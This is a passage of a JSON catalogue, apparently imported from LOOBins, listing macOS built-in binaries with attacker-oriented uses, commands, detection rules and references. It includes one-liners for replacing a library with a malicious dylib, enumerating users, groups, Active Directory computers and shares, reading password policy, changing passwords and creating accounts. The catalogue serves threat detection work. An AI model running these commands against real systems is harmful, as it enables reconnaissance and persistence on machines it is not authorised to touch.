"name": "DLL hijacking", 948 "source": "LOOBins", 949 "platform": [ 950 "macOS" 951 ], 952 "capability": [ 953 "Persistence" 954 ], 955 "nativeCategory": [ 956 "Persistence" 957 ], 958 "command": "ditto -V /path/to/malicious-library/malicious_library.dylib /path/to/target-library/original_library.dylib", 959 "description": "Replace a legitimate library with a malicious one while maintaining the original file permissions and attributes.", 960 "mitre": [], 961 "fullPath": [ 962 "/usr/bin/ditto" 963 ], 964 "environment": [ 965 "Local host" 966 ], 967 "availability": "Built in", 968 "verification": "Upstream reference", 969 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 970 "detection": [ 971 { 972 "type": "No detection content at time of writing", 973 "value": "No detection content at time of writing" 974 } 975 ], 976 "references": [ 977 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml", 978 "https://ss64.com/osx/ditto.html", 979 "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", 980 "https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/" 981 ] 982 }, 983 { 984 "id": "loobins:dns-sd:53f3998acc18fff6", 985 "toolId": "loobins:dns-sd", 986 "toolName": "dns-sd", 987 "name": "Discover SSH hosts", 988 "source": "LOOBins", 989 "platform": [ 990 "macOS" 991 ], 992 "capability": [ 993 "Discovery" 994 ], 995 "nativeCategory": [ 996 "Discovery" 997 ], 998 "command": "dns-sd -B _ssh._tcp", 999 "description": "Hosts serving SSH can be discovered using the _ssh._tcp service string.", 1000 "mitre": [], 1001 "fullPath": [ 1002 "/usr/bin/dns-sd" 1003 ], 1004 "environment": [ 1005 "Local host" 1006 ], 1007 "availability": "Built in", 1008 "verification": "Upstream reference", 1009 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1010 "detection": [ 1011 { 1012 "type": "Jamf Protect: Detect dns-sd discovery activity", 1013 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery" 1014 } 1015 ], 1016 "references": [ 1017 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml", 1018 "https://themittenmac.com/what-does-apt-activity-look-like-on-macos", 1019 "https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/" 1020 ] 1021 }, 1022 { 1023 "id": "loobins:dns-sd:53dfc1310c71878f", 1024 "toolId": "loobins:dns-sd", 1025 "toolName": "dns-sd", 1026 "name": "Discover web hosts", 1027 "source": "LOOBins", 1028 "platform": [ 1029 "macOS" 1030 ], 1031 "capability": [ 1032 "Discovery" 1033 ], 1034 "nativeCategory": [ 1035 "Discovery" 1036 ], 1037 "command": "dns-sd -B _http._tcp", 1038 "description": "Hosts serving web services can be discovered using the _http._tcp service string.", 1039 "mitre": [], 1040 "fullPath": [ 1041 "/usr/bin/dns-sd" 1042 ], 1043 "environment": [ 1044 "Local host" 1045 ], 1046 "availability": "Built in", 1047 "verification": "Upstream reference", 1048 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1049 "detection": [ 1050 { 1051 "type": "Jamf Protect: Detect dns-sd discovery activity", 1052 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery" 1053 } 1054 ], 1055 "references": [ 1056 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml", 1057 "https://themittenmac.com/what-does-apt-activity-look-like-on-macos", 1058 "https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/" 1059 ] 1060 }, 1061 { 1062 "id": "loobins:dns-sd:fb0f781dd1ea98d0", 1063 "toolId": "loobins:dns-sd", 1064 "toolName": "dns-sd", 1065 "name": "Discover hosts serving remote screen sharing", 1066 "source": "LOOBins", 1067 "platform": [ 1068 "macOS" 1069 ], 1070 "capability": [ 1071 "Discovery" 1072 ], 1073 "nativeCategory": [ 1074 "Discovery" 1075 ], 1076 "command": "dns-sd -B _rfb._tcp", 1077 "description": "Hosts serving remote screen sharing can be discovered using the _rfb._tcp service string.", 1078 "mitre": [], 1079 "fullPath": [ 1080 "/usr/bin/dns-sd" 1081 ], 1082 "environment": [ 1083 "Local host" 1084 ], 1085 "availability": "Built in", 1086 "verification": "Upstream reference", 1087 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1088 "detection": [ 1089 { 1090 "type": "Jamf Protect: Detect dns-sd discovery activity", 1091 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery" 1092 } 1093 ], 1094 "references": [ 1095 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml", 1096 "https://themittenmac.com/what-does-apt-activity-look-like-on-macos", 1097 "https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/" 1098 ] 1099 }, 1100 { 1101 "id": "loobins:dns-sd:917b3a1e5a1ef7f0", 1102 "toolId": "loobins:dns-sd", 1103 "toolName": "dns-sd", 1104 "name": "Discover hosts serving SMB", 1105 "source": "LOOBins", 1106 "platform": [ 1107 "macOS" 1108 ], 1109 "capability": [ 1110 "Discovery" 1111 ], 1112 "nativeCategory": [ 1113 "Discovery" 1114 ], 1115 "command": "dns-sd -B _smb._tcp", 1116 "description": "Hosts serving SMB can be discovered using the _smb._tcp service string.", 1117 "mitre": [], 1118 "fullPath": [ 1119 "/usr/bin/dns-sd" 1120 ], 1121 "environment": [ 1122 "Local host" 1123 ], 1124 "availability": "Built in", 1125 "verification": "Upstream reference", 1126 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1127 "detection": [ 1128 { 1129 "type": "Jamf Protect: Detect dns-sd discovery activity", 1130 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery" 1131 } 1132 ], 1133 "references": [ 1134 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml", 1135 "https://themittenmac.com/what-does-apt-activity-look-like-on-macos", 1136 "https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/" 1137 ] 1138 }, 1139 { 1140 "id": "loobins:dscacheutil:93caef4af761b12e", 1141 "toolId": "loobins:dscacheutil", 1142 "toolName": "dscacheutil", 1143 "name": "Lookup a user", 1144 "source": "LOOBins", 1145 "platform": [ 1146 "macOS" 1147 ], 1148 "capability": [ 1149 "Discovery" 1150 ], 1151 "nativeCategory": [ 1152 "Discovery" 1153 ], 1154 "command": "dscacheutil -q user -a name <USER_NAME>", 1155 "description": "List the user information", 1156 "mitre": [], 1157 "fullPath": [ 1158 "/usr/bin/dscacheutil" 1159 ], 1160 "environment": [ 1161 "Local host" 1162 ], 1163 "availability": "Built in", 1164 "verification": "Upstream reference", 1165 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1166 "detection": [ 1167 { 1168 "type": "No detections at time of publishing", 1169 "value": "No detections at time of publishing" 1170 } 1171 ], 1172 "references": [ 1173 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscacheutil.yml", 1174 "https://macosbin.com/bin/dscacheutil", 1175 "https://ss64.com/osx/dscacheutil.html" 1176 ] 1177 }, 1178 { 1179 "id": "loobins:dscacheutil:f6160d0f4f84e6d3", 1180 "toolId": "loobins:dscacheutil", 1181 "toolName": "dscacheutil", 1182 "name": "Lookup all users", 1183 "source": "LOOBins", 1184 "platform": [ 1185 "macOS" 1186 ], 1187 "capability": [ 1188 "Discovery" 1189 ], 1190 "nativeCategory": [ 1191 "Discovery" 1192 ], 1193 "command": "dscacheutil -q user", 1194 "description": "List all user information", 1195 "mitre": [], 1196 "fullPath": [ 1197 "/usr/bin/dscacheutil" 1198 ], 1199 "environment": [ 1200 "Local host" 1201 ], 1202 "availability": "Built in", 1203 "verification": "Upstream reference", 1204 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1205 "detection": [ 1206 { 1207 "type": "No detections at time of publishing", 1208 "value": "No detections at time of publishing" 1209 } 1210 ], 1211 "references": [ 1212 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscacheutil.yml", 1213 "https://macosbin.com/bin/dscacheutil", 1214 "https://ss64.com/osx/dscacheutil.html" 1215 ] 1216 }, 1217 { 1218 "id": "loobins:dscl:305c394aed388f3e", 1219 "toolId": "loobins:dscl", 1220 "toolName": "dscl", 1221 "name": "Local user enumeration", 1222 "source": "LOOBins", 1223 "platform": [ 1224 "macOS" 1225 ], 1226 "capability": [ 1227 "Discovery" 1228 ], 1229 "nativeCategory": [ 1230 "Discovery" 1231 ], 1232 "command": "dscl . -list /Users\ndscl . list /Users\ndscl . ls /Users", 1233 "description": "Enumerate all local users.", 1234 "mitre": [], 1235 "fullPath": [ 1236 "/usr/bin/dscl" 1237 ], 1238 "environment": [ 1239 "Local host" 1240 ], 1241 "availability": "Built in", 1242 "verification": "Upstream reference", 1243 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1244 "detection": [ 1245 { 1246 "type": "Jamf Protect: Detect user account creation with dscl", 1247 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1248 } 1249 ], 1250 "references": [ 1251 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1252 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1253 "https://attack.mitre.org/techniques/T1136/001/" 1254 ] 1255 }, 1256 { 1257 "id": "loobins:dscl:87ecd9f8ac4a7b04", 1258 "toolId": "loobins:dscl", 1259 "toolName": "dscl", 1260 "name": "Active Directory user enumeration", 1261 "source": "LOOBins", 1262 "platform": [ 1263 "macOS" 1264 ], 1265 "capability": [ 1266 "Discovery" 1267 ], 1268 "nativeCategory": [ 1269 "Discovery" 1270 ], 1271 "command": "dscl \"/Active Directory/TEST/All Domains\" -list /Users\ndscl \"/Active Directory/TEST/All Domains\" list /Users\ndscl \"/Active Directory/TEST/All Domains\" ls /Users", 1272 "description": "Enumerate all Active Directory users.", 1273 "mitre": [], 1274 "fullPath": [ 1275 "/usr/bin/dscl" 1276 ], 1277 "environment": [ 1278 "Local host" 1279 ], 1280 "availability": "Built in", 1281 "verification": "Upstream reference", 1282 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1283 "detection": [ 1284 { 1285 "type": "Jamf Protect: Detect user account creation with dscl", 1286 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1287 } 1288 ], 1289 "references": [ 1290 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1291 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1292 "https://attack.mitre.org/techniques/T1136/001/" 1293 ] 1294 }, 1295 { 1296 "id": "loobins:dscl:781562790fe8a5bc", 1297 "toolId": "loobins:dscl", 1298 "toolName": "dscl", 1299 "name": "Local user information gathering", 1300 "source": "LOOBins", 1301 "platform": [ 1302 "macOS" 1303 ], 1304 "capability": [ 1305 "Discovery" 1306 ], 1307 "nativeCategory": [ 1308 "Discovery" 1309 ], 1310 "command": "dscl . -read /Users/$USERNAME\ndscl . read /Users/$USERNAME\ndscl . cat /Users/$USERNAME", 1311 "description": "Gain useful local user information such as when their password was last set, their keyboard layout, their avatar, their home directory, UID and default shell.", 1312 "mitre": [], 1313 "fullPath": [ 1314 "/usr/bin/dscl" 1315 ], 1316 "environment": [ 1317 "Local host" 1318 ], 1319 "availability": "Built in", 1320 "verification": "Upstream reference", 1321 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1322 "detection": [ 1323 { 1324 "type": "Jamf Protect: Detect user account creation with dscl", 1325 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1326 } 1327 ], 1328 "references": [ 1329 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1330 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1331 "https://attack.mitre.org/techniques/T1136/001/" 1332 ] 1333 }, 1334 { 1335 "id": "loobins:dscl:0aaf21612b3bff0f", 1336 "toolId": "loobins:dscl", 1337 "toolName": "dscl", 1338 "name": "Active Directory user information gathering", 1339 "source": "LOOBins", 1340 "platform": [ 1341 "macOS" 1342 ], 1343 "capability": [ 1344 "Discovery" 1345 ], 1346 "nativeCategory": [ 1347 "Discovery" 1348 ], 1349 "command": "dscl \"/Active Directory/TEST/All Domains\" -read /Users/$USERNAME\ndscl \"/Active Directory/TEST/All Domains\" read /Users/$USERNAME\ndscl \"/Active Directory/TEST/All Domains\" cat /Users/$USERNAME", 1350 "description": "Gain useful Active Directory user information such as when their password was last set, their keyboard layout, their avatar, their home directory, UID and default shell.", 1351 "mitre": [], 1352 "fullPath": [ 1353 "/usr/bin/dscl" 1354 ], 1355 "environment": [ 1356 "Local host" 1357 ], 1358 "availability": "Built in", 1359 "verification": "Upstream reference", 1360 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1361 "detection": [ 1362 { 1363 "type": "Jamf Protect: Detect user account creation with dscl", 1364 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1365 } 1366 ], 1367 "references": [ 1368 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1369 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1370 "https://attack.mitre.org/techniques/T1136/001/" 1371 ] 1372 }, 1373 { 1374 "id": "loobins:dscl:bd588af20e609166", 1375 "toolId": "loobins:dscl", 1376 "toolName": "dscl", 1377 "name": "Local group enumeration", 1378 "source": "LOOBins", 1379 "platform": [ 1380 "macOS" 1381 ], 1382 "capability": [ 1383 "Discovery" 1384 ], 1385 "nativeCategory": [ 1386 "Discovery" 1387 ], 1388 "command": "dscl . -list /Groups\ndscl . list /Groups\ndscl . ls /Groups", 1389 "description": "Enumerate all local groups.", 1390 "mitre": [], 1391 "fullPath": [ 1392 "/usr/bin/dscl" 1393 ], 1394 "environment": [ 1395 "Local host" 1396 ], 1397 "availability": "Built in", 1398 "verification": "Upstream reference", 1399 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1400 "detection": [ 1401 { 1402 "type": "Jamf Protect: Detect user account creation with dscl", 1403 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1404 } 1405 ], 1406 "references": [ 1407 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1408 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1409 "https://attack.mitre.org/techniques/T1136/001/" 1410 ] 1411 }, 1412 { 1413 "id": "loobins:dscl:df32b72c44b8006f", 1414 "toolId": "loobins:dscl", 1415 "toolName": "dscl", 1416 "name": "Active Directory group enumeration", 1417 "source": "LOOBins", 1418 "platform": [ 1419 "macOS" 1420 ], 1421 "capability": [ 1422 "Discovery" 1423 ], 1424 "nativeCategory": [ 1425 "Discovery" 1426 ], 1427 "command": "dscl \"/Active Directory/TEST/All Domains\" -list /Groups\ndscl \"/Active Directory/TEST/All Domains\" list /Groups\ndscl \"/Active Directory/TEST/All Domains\" ls /Groups", 1428 "description": "Enumerate all Active Directory groups.", 1429 "mitre": [], 1430 "fullPath": [ 1431 "/usr/bin/dscl" 1432 ], 1433 "environment": [ 1434 "Local host" 1435 ], 1436 "availability": "Built in", 1437 "verification": "Upstream reference", 1438 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1439 "detection": [ 1440 { 1441 "type": "Jamf Protect: Detect user account creation with dscl", 1442 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1443 } 1444 ], 1445 "references": [ 1446 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1447 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1448 "https://attack.mitre.org/techniques/T1136/001/" 1449 ] 1450 }, 1451 { 1452 "id": "loobins:dscl:c4ea898c6011f465", 1453 "toolId": "loobins:dscl", 1454 "toolName": "dscl", 1455 "name": "Local group information gathering", 1456 "source": "LOOBins", 1457 "platform": [ 1458 "macOS" 1459 ], 1460 "capability": [ 1461 "Discovery" 1462 ], 1463 "nativeCategory": [ 1464 "Discovery" 1465 ], 1466 "command": "dscl . -read /Groups/$GROUPNAME\ndscl . read /Groups/$GROUPNAME\ndscl . cat /Groups/$GROUPNAME", 1467 "description": "Gain useful local group information such as which users belong to that group, SMB SIDs and group ID. Especially useful for the \"admin\" group.", 1468 "mitre": [], 1469 "fullPath": [ 1470 "/usr/bin/dscl" 1471 ], 1472 "environment": [ 1473 "Local host" 1474 ], 1475 "availability": "Built in", 1476 "verification": "Upstream reference", 1477 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1478 "detection": [ 1479 { 1480 "type": "Jamf Protect: Detect user account creation with dscl", 1481 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1482 } 1483 ], 1484 "references": [ 1485 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1486 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1487 "https://attack.mitre.org/techniques/T1136/001/" 1488 ] 1489 }, 1490 { 1491 "id": "loobins:dscl:865a049f12f3d6ec", 1492 "toolId": "loobins:dscl", 1493 "toolName": "dscl", 1494 "name": "Active Directory group information gathering", 1495 "source": "LOOBins", 1496 "platform": [ 1497 "macOS" 1498 ], 1499 "capability": [ 1500 "Discovery" 1501 ], 1502 "nativeCategory": [ 1503 "Discovery" 1504 ], 1505 "command": "dscl \"/Active Directory/TEST/All Domains\" -read /Groups/$GROUPNAME\ndscl \"/Active Directory/TEST/All Domains\" read /Groups/$GROUPNAME\ndscl \"/Active Directory/TEST/All Domains\" cat /Groups/$GROUPNAME", 1506 "description": "Gain useful Active Directory group information such as which users belong to that group, SMB SIDs and group ID. Especially useful for the \"admin\" group.", 1507 "mitre": [], 1508 "fullPath": [ 1509 "/usr/bin/dscl" 1510 ], 1511 "environment": [ 1512 "Local host" 1513 ], 1514 "availability": "Built in", 1515 "verification": "Upstream reference", 1516 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1517 "detection": [ 1518 { 1519 "type": "Jamf Protect: Detect user account creation with dscl", 1520 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1521 } 1522 ], 1523 "references": [ 1524 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1525 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1526 "https://attack.mitre.org/techniques/T1136/001/" 1527 ] 1528 }, 1529 { 1530 "id": "loobins:dscl:78cc0d939d564e02", 1531 "toolId": "loobins:dscl", 1532 "toolName": "dscl", 1533 "name": "Computer enumeration", 1534 "source": "LOOBins", 1535 "platform": [ 1536 "macOS" 1537 ], 1538 "capability": [ 1539 "Discovery" 1540 ], 1541 "nativeCategory": [ 1542 "Discovery" 1543 ], 1544 "command": "dscl \"/Active Directory/TEST/All Domains\" -list /Computers\ndscl \"/Active Directory/TEST/All Domains\" list /Computers\ndscl \"/Active Directory/TEST/All Domains\" ls /Computers", 1545 "description": "Enumerate all computers in an Active Directory.", 1546 "mitre": [], 1547 "fullPath": [ 1548 "/usr/bin/dscl" 1549 ], 1550 "environment": [ 1551 "Local host" 1552 ], 1553 "availability": "Built in", 1554 "verification": "Upstream reference", 1555 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1556 "detection": [ 1557 { 1558 "type": "Jamf Protect: Detect user account creation with dscl", 1559 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1560 } 1561 ], 1562 "references": [ 1563 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1564 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1565 "https://attack.mitre.org/techniques/T1136/001/" 1566 ] 1567 }, 1568 { 1569 "id": "loobins:dscl:ea5053a7d3a10be1", 1570 "toolId": "loobins:dscl", 1571 "toolName": "dscl", 1572 "name": "Share enumeration", 1573 "source": "LOOBins", 1574 "platform": [ 1575 "macOS" 1576 ], 1577 "capability": [ 1578 "Discovery" 1579 ], 1580 "nativeCategory": [ 1581 "Discovery" 1582 ], 1583 "command": "dscl . -list /SharePoints\ndscl . list /SharePoints\ndscl . ls /SharePoints", 1584 "description": "Enumerate all shares.", 1585 "mitre": [], 1586 "fullPath": [ 1587 "/usr/bin/dscl" 1588 ], 1589 "environment": [ 1590 "Local host" 1591 ], 1592 "availability": "Built in", 1593 "verification": "Upstream reference", 1594 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1595 "detection": [ 1596 { 1597 "type": "Jamf Protect: Detect user account creation with dscl", 1598 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1599 } 1600 ], 1601 "references": [ 1602 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1603 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1604 "https://attack.mitre.org/techniques/T1136/001/" 1605 ] 1606 }, 1607 { 1608 "id": "loobins:dscl:f13b20540d299c2d", 1609 "toolId": "loobins:dscl", 1610 "toolName": "dscl", 1611 "name": "Password policy discovery", 1612 "source": "LOOBins", 1613 "platform": [ 1614 "macOS" 1615 ], 1616 "capability": [ 1617 "Discovery" 1618 ], 1619 "nativeCategory": [ 1620 "Discovery" 1621 ], 1622 "command": "dscl . -read /Config/shadowhash\ndscl . read /Config/shadowhash\ndscl . cat /Config/shadowhash", 1623 "description": "Gain password policy information", 1624 "mitre": [], 1625 "fullPath": [ 1626 "/usr/bin/dscl" 1627 ], 1628 "environment": [ 1629 "Local host" 1630 ], 1631 "availability": "Built in", 1632 "verification": "Upstream reference", 1633 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1634 "detection": [ 1635 { 1636 "type": "Jamf Protect: Detect user account creation with dscl", 1637 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1638 } 1639 ], 1640 "references": [ 1641 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1642 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1643 "https://attack.mitre.org/techniques/T1136/001/" 1644 ] 1645 }, 1646 { 1647 "id": "loobins:dscl:d03f29ced7de9fa7", 1648 "toolId": "loobins:dscl", 1649 "toolName": "dscl", 1650 "name": "Change a user password", 1651 "source": "LOOBins", 1652 "platform": [ 1653 "macOS" 1654 ], 1655 "capability": [ 1656 "Persistence" 1657 ], 1658 "nativeCategory": [ 1659 "Persistence" 1660 ], 1661 "command": "dscl . passwd /Users/$USERNAME oldPassword newPassword", 1662 "description": "Change an existing user's password.", 1663 "mitre": [], 1664 "fullPath": [ 1665 "/usr/bin/dscl" 1666 ], 1667 "environment": [ 1668 "Local host" 1669 ], 1670 "availability": "Built in", 1671 "verification": "Upstream reference", 1672 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1673 "detection": [ 1674 { 1675 "type": "Jamf Protect: Detect user account creation with dscl", 1676 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1677 } 1678 ], 1679 "references": [ 1680 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1681 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1682 "https://attack.mitre.org/techniques/T1136/001/" 1683 ] 1684 }, 1685 { 1686 "id": "loobins:dscl:f2b5add196364c9e", 1687 "toolId": "loobins:dscl", 1688 "toolName": "dscl", 1689 "name": "Local account creation", 1690 "source": "LOOBins", 1691 "platform": [ 1692 "macOS" 1693 ], 1694 "capability": [ 1695 "Persistence" 1696 ], 1697 "nativeCategory": [ 1698 "Persistence" 1699 ], 1700 "command": "dscl -create", 1701 "description": "Create a local account", 1702 "mitre": [], 1703 "fullPath": [ 1704 "/usr/bin/dscl" 1705 ], 1706 "environment": [ 1707 "Local host" 1708 ], 1709 "availability": "Built in", 1710 "verification": "Upstream reference", 1711 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1712 "detection": [ 1713 { 1714 "type": "Jamf Protect: Detect user account creation with dscl", 1715 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" 1716 } 1717 ], 1718 "references": [ 1719 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", 1720 "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", 1721 "https://attack.mitre.org/techniques/T1136/001/" 1722 ] 1723 }, 1724 { 1725 "id": "loobins:dsconfigad:fd9fa9501ea9dc2b", 1726 "toolId": "loobins:dsconfigad", 1727 "toolName": "dsconfigad", 1728 "name": "Retrieves the Active Directory configuration", 1729 "source": "LOOBins", 1730 "platform": [ 1731 "macOS" 1732 ], 1733 "capability": [ 1734 "Discovery" 1735 ], 1736 "nativeCategory": [ 1737 "Discovery" 1738 ], 1739 "command": "dsconfigad -show", 1740 "description": "Retrieves the Active Directory configuration", 1741 "mitre": [], 1742 "fullPath": [ 1743 "/usr/sbin/dsconfigad" 1744 ], 1745 "environment": [ 1746 "Local host" 1747 ], 1748 "availability": "Built in", 1749 "verification": "Upstream reference", 1750 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1751 "detection": [ 1752 { 1753 "type": "No detections at time of publishing", 1754 "value": "No detections at time of publishing" 1755 } 1756 ], 1757 "references": [ 1758 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsconfigad.yml", 1759 "https://macosbin.com/bin/dsconfigad", 1760 "https://www.unix.com/man-page/osx/8/dsconfigad/" 1761 ] 1762 }, 1763 { 1764 "id": "loobins:dsconfigad:ccfb8e32a60568c7", 1765 "toolId": "loobins:dsconfigad", 1766 "toolName": "dsconfigad", 1767 "name": "Retrieves the Active Directory name", 1768 "source": "LOOBins", 1769 "platform": [ 1770 "macOS" 1771 ], 1772 "capability": [ 1773 "Discovery" 1774 ], 1775 "nativeCategory": [ 1776 "Discovery" 1777 ], 1778 "command": "dsconfigad -show |awk '/Active Directory Domain/{print $NF}'", 1779 "description": "Retrieves the Active Directory name", 1780 "mitre": [], 1781 "fullPath": [ 1782 "/usr/sbin/dsconfigad" 1783 ], 1784 "environment": [ 1785 "Local host" 1786 ], 1787 "availability": "Built in", 1788 "verification": "Upstream reference", 1789 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 1790 "detection": [ 1791 { 1792 "type": "No detections at time of publishing", 1793 "value": "No detections at time of publishing" 1794 } 1795 ], 1796 "references": [ 1797 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsconfigad.yml", 1798 "https://macosbin.com/bin/dsconfigad", 1799 "https://www.unix.com/man-page/osx/8/dsconfigad/" 1800 ] 1801 }, 1802 { 1803 "id": "loobins:dsexport:3d1f9656f3a0dec0", 1804 "toolId": "loobins:dsexport", 1805 "toolName": "dsexport", 1806 "name": "Export local host users", 1807 "source": "LOOBins", 1808 "platform": [ 1809 "macOS" 1810 ], 1811 "capability": [ 1812 "Discovery" 1813 ], 1814 "nativeCategory": [ 1815 "Reconnaissance", 1816 "Discovery" 1817 ], 1818 "command": "dsexport local_users.txt /Local/Default dsRecTypeStandard:Users", 1819 "description": "Export the local host user information to a file", 1820 